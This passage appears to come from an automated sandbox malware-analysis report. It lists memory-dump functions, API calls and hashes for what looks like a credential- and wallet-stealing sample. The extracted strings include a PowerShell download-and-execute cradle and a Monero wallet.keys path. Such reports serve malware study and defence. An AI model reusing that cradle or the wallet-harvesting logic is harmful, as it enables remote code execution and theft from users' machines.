                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: af34b44d1a462bb824314b9db19c2224095984207c46fe91b19d52ee4cba300c
                        • Instruction ID: b81518e7e7e14896ce1fd2566d873634a33abaff72938563482ba9731c7e78de
                        • Opcode Fuzzy Hash: af34b44d1a462bb824314b9db19c2224095984207c46fe91b19d52ee4cba300c
                        • Instruction Fuzzy Hash: 4E3112B4E01218ABDB20CF54CC85BDCB7B5EB48704F1081D9EA09A7281CB746EC5CF99
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006E8426
                        • wsprintfA.USER32 ref: 006E8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006E847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E8499
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                        • RegQueryValueExA.ADVAPI32(00000000,00E4E4D0,00000000,000F003F,?,00000400), ref: 006E84EC
                        • lstrlen.KERNEL32(?), ref: 006E8501
                        • RegQueryValueExA.ADVAPI32(00000000,00E4E548,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006F0B34), ref: 006E8599
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E8608
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 1d0afb3ef1f6bd607307fe56d5334719ffdf2d04116c977753ebeb4a11f34379
                        • Instruction ID: def8ec3c70cebf8191130a8cac2290e486565f7582127c40fb5ac6c961007ea7
                        • Opcode Fuzzy Hash: 1d0afb3ef1f6bd607307fe56d5334719ffdf2d04116c977753ebeb4a11f34379
                        • Instruction Fuzzy Hash: C02107B1A15218AFDB24DB54DC85FE9B3B9FB48700F00C1D9A609A6280DF71AA85CFD4
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E773B
                        • RegOpenKeyExA.ADVAPI32(80000002,00E3C128,00000000,00020119,006E76B9), ref: 006E775B
                        • RegQueryValueExA.ADVAPI32(006E76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 006E777A
                        • RegCloseKey.ADVAPI32(006E76B9), ref: 006E7784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 3fdc701027117203ba572671f6f41300285dbb73ff3b5bc7c332ef171aa95fa8
                        • Instruction ID: d7bf9d6e4e5c80ee3218f35b3699353e7d5efdcca6e8e0690059e1d10c6447cd
                        • Opcode Fuzzy Hash: 3fdc701027117203ba572671f6f41300285dbb73ff3b5bc7c332ef171aa95fa8
                        • Instruction Fuzzy Hash: 37012CB5A55308BBEB00DBE4DC4AFEEB7B8EB48700F108199FA15A7281DA705A00DB51
                        APIs
                        • CreateFileA.KERNEL32(:n,80000000,00000003,00000000,00000003,00000080,00000000,?,006E3AEE,?), ref: 006E92FC
                        • GetFileSizeEx.KERNEL32(000000FF,:n), ref: 006E9319
                        • CloseHandle.KERNEL32(000000FF), ref: 006E9327
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :n$:n
                        • API String ID: 1378416451-3885358969
                        • Opcode ID: b2fbc712a94a33c11676a4d45a1d18bd0b12e5829bcc4e9a20240992eb1cf455
                        • Instruction ID: f5c6d1f5ca55491244d49bd546625feffb671680f361a4a8b2d84a993cf40a90
                        • Opcode Fuzzy Hash: b2fbc712a94a33c11676a4d45a1d18bd0b12e5829bcc4e9a20240992eb1cf455
                        • Instruction Fuzzy Hash: 1CF03C35F55308BBDB10DBB1DC49B9EB7BAAB48720F10C254BA51A72C0D6719B01DF50
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                        • LocalFree.KERNEL32(006D148F), ref: 006D9A90
                        • CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 314b70e04b1de503e461edf0e87e546d780d8ff9a3c78479cc97f5b93bb86b57
                        • Instruction ID: b54ea5b130970fa97194fc67899d5277ebb1eb7855b6e139cdc4e0c221fdc817
                        • Opcode Fuzzy Hash: 314b70e04b1de503e461edf0e87e546d780d8ff9a3c78479cc97f5b93bb86b57
                        • Instruction Fuzzy Hash: 933103B4E01209EFDB14CFA4C985BEE77B6BF48350F108159E901A7390D779AA81CFA1
                        APIs
                        • StrStrA.SHLWAPI(,?,?,?,006E140C,?,00E4E0E0,00000000), ref: 006E926C
                        • lstrcpyn.KERNEL32(0091AB88,,,?,006E140C,?,00E4E0E0), ref: 006E9290
                        • lstrlen.KERNEL32(?,?,006E140C,?,00E4E0E0), ref: 006E92A7
                        • wsprintfA.USER32 ref: 006E92C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s$
                        • API String ID: 1206339513-2079566551
                        • Opcode ID: 8dc59fde0fad51cc4c23287703ca13905746424283d45c28cfed7a783c6193c9
                        • Instruction ID: 782a7170d442a431ee5323ea723aadb1e600da4c719fab320a3cd4a6809f5fd1
                        • Opcode Fuzzy Hash: 8dc59fde0fad51cc4c23287703ca13905746424283d45c28cfed7a783c6193c9
                        • Instruction Fuzzy Hash: F401E975655248FFCB04DFE8D984EEE7BB9EF44364F108148F9098B241C631AE40DB91
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006E2D85
                        Strings
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 006E2D04
                        • ')", xrefs: 006E2CB3
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 006E2CC4
                        • <, xrefs: 006E2D39
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: c360f07c747113f6ecb028bcaa91fb733ffdd61aa7e6198d84b16714d8a044ed
                        • Instruction ID: 58d9040233fc5b64b6e7a7bdf9d092e0097a8bfc7a3bee2f33095e2c49a625f8
                        • Opcode Fuzzy Hash: c360f07c747113f6ecb028bcaa91fb733ffdd61aa7e6198d84b16714d8a044ed
                        • Instruction Fuzzy Hash: C241FF71C123489AEB54EBE1C892BEEB776AF10300F41411DE106A7196EF743A4ACF99
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 006D9F41
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 3520d2fc9e5125688771d62677cc27d57a68b570510b3c25739943fd265ec6ab
                        • Instruction ID: 97d59ee9959dd5afbe50c55c72f6ddfee57e487d3df6798b10a30547d9b77d6c
                        • Opcode Fuzzy Hash: 3520d2fc9e5125688771d62677cc27d57a68b570510b3c25739943fd265ec6ab
                        • Instruction Fuzzy Hash: DC615070A11248EBDB24EFE4DD96FEE777AAF45304F008118F9095F281EB746A06CB56
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,00E4DBE0,00000000,00020119,?), ref: 006E40F4
                        • RegQueryValueExA.ADVAPI32(?,00E4DEB8,00000000,00000000,00000000,000000FF), ref: 006E4118
                        • RegCloseKey.ADVAPI32(?), ref: 006E4122
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4147
                        • lstrcat.KERNEL32(?,00E4DF30), ref: 006E415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 391cf1db65b52afbd2d6a75d8b103a5d2c12a77d560cc1db3e5750cf0b18d010
                        • Instruction ID: 50b3549f06dc832f58ab2a705fad9874ecbeaad2364069385ca1377bc18a4a90
                        • Opcode Fuzzy Hash: 391cf1db65b52afbd2d6a75d8b103a5d2c12a77d560cc1db3e5750cf0b18d010
                        • Instruction Fuzzy Hash: E4418AB6D102086BDB14EBE0EC56FFE733DAB48300F40855DB61557181EAB55F88CB92
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E7E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,00E3C470,00000000,00020119,?), ref: 006E7E5E
                        • RegQueryValueExA.ADVAPI32(?,00E4DD40,00000000,00000000,000000FF,000000FF), ref: 006E7E7F
                        • RegCloseKey.ADVAPI32(?), ref: 006E7E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 02514fb8a0c3350726543fd8ef96af5a35927b6de0eb5b40a528cf0867c6447b
                        • Instruction ID: 715e1503b1d2b24e900531486c518e0f983f177c84272086e49d9107ffdf1262
                        • Opcode Fuzzy Hash: 02514fb8a0c3350726543fd8ef96af5a35927b6de0eb5b40a528cf0867c6447b
                        • Instruction Fuzzy Hash: 0E118CB1A49309EBD710CF95DD4AFBBBBB9EB04B10F108159F605A7280D7745D01DBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006D12B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D12BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006D12D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006D12F5
                        • RegCloseKey.ADVAPI32(?), ref: 006D12FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: dc3c9f6cc9292079300ebfaf3c16ed2ce26ca727333d4b870daafa994de58dd7
                        • Instruction ID: dc869b647b80a882130f1463d95f96e4299da69a07a079683cafb1136c92e740
                        • Opcode Fuzzy Hash: dc3c9f6cc9292079300ebfaf3c16ed2ce26ca727333d4b870daafa994de58dd7
                        • Instruction Fuzzy Hash: 020131B9B54208BBDB00DFE4DC49FEEB7B8EB48701F008199FA1597280D6759A01DF51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
